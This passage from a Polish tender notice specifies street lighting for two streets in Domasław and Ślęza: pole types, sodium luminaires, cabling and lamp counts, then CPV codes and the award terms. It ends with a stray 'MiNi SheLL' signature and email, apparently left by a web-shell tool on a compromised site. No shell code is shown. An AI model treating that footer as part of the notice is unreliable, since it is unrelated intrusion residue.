e) Domasław ul. Kwiatowa.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnika 0,5 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 835 m.
Ilość opraw 23 sztuk.
Ilość latarni 23 sztuk.

f) Ślęza ul. Szyszkowa.
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 6 m bez wysięgnika. Dobór słupa w oparciu o obliczenia dla słupa np. AURIGA P 60 6 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 191 m.
Ilość opraw 6 sztuk.
Ilość latarni 6 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.14.00-9, 45.31.61.10-9, 45.23.20.00-2, 45.31.43.00-4, 45.23.31.42-6, 45.11.27.10-5, 45.31.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com